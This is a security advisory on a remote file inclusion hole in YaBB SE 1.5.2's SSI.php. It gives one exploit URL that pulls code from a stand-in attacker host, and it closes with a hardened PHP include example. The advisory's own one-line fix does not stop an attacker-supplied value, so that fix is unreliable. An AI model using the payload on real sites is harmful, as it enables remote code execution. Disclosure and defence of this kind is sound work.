CourtneyDS
Remote code execution in YaBBse 1.5.2 (php version)
======[ Overview
YaBB is a widely used bulletin board system.
======[ Problem
One of the files that are included in main application is vulnerable
to remote code execution if it is accessed directly with certain
parameters.
Name of the file is SSI.php.
Similar bug was discovered in previous version YaBB 1.5.1.
SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------
We can define $sourcedir variable through URL and include some other PHP script local or remote if remote inclusion is enabled in php.ini file ...
Bug is not exploitable if PHP's register_globals is set to off ...
======[ Exploit
Exploit would look like this:
http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com
Attacker would place an Errors.php file on his server ... The code included would get executed on victim's server ...
Attacker's httpd server should not have php enabled because the
script will be parsed before sending it to the victim ...
======[ Solution
Add this line before include_once() lines mentioned above.
if (!isset($sourcedir)) $sourcedir = "";
======[ Greetz ]======
Greetz goes to hr.hackers and linux.
Special greetz goes to (rand()): BoyScout, h4z4rd, Çòùrtnèy, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.
** Credit to eLtorO **
Sincerely
CourtneyDS
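
A hardened form of the include block quoted in the post, as an added example that is not part of the original post and is not YaBB SE code. It assigns the directory unconditionally from the script's own location, so a request-supplied `sourcedir` is overwritten, and it checks every resolved path before including it. `ALLOWED_SOURCES`, `resolve_source()` and the `Sources` directory beside the script are assumptions made for illustration.

```php
<?php
// Added example, not YaBB SE code. ALLOWED_SOURCES and resolve_source()
// are hypothetical names; the "Sources" directory layout is an assumption.
const ALLOWED_SOURCES = ['Errors.php', 'Subs.php', 'Load.php'];

/**
 * Return the absolute local path of an allow-listed file inside $baseDir.
 * Throws if the name is unexpected or the path resolves anywhere else.
 */
function resolve_source(string $baseDir, string $file): string
{
    // Only the file names the script is meant to load.
    if (!in_array($file, ALLOWED_SOURCES, true)) {
        throw new RuntimeException("not an allow-listed source: $file");
    }
    // realpath() returns false for anything that is not an existing local
    // path, and collapses "../" segments and symlinks in what does exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    // The resolved file must sit directly inside the resolved base directory.
    if ($base === false || $path === false || dirname($path) !== $base) {
        throw new RuntimeException("refusing to include $file from $baseDir");
    }
    return $path;
}

// Assigned unconditionally from this script's own location, so a value
// that arrived through the query string is overwritten before any include.
$sourcedir = __DIR__ . DIRECTORY_SEPARATOR . 'Sources';

try {
    foreach (ALLOWED_SOURCES as $file) {
        include_once resolve_source($sourcedir, $file);
    }
} catch (RuntimeException $e) {
    // Fail closed: log the reason server-side, reveal nothing to the client.
    error_log('SSI bootstrap: ' . $e->getMessage());
    http_response_code(500);
    exit;
}
```

On the server side, `register_globals = Off` and `allow_url_include = Off` in php.ini remove the two preconditions the post names; both directives exist in PHP versions that still ship them.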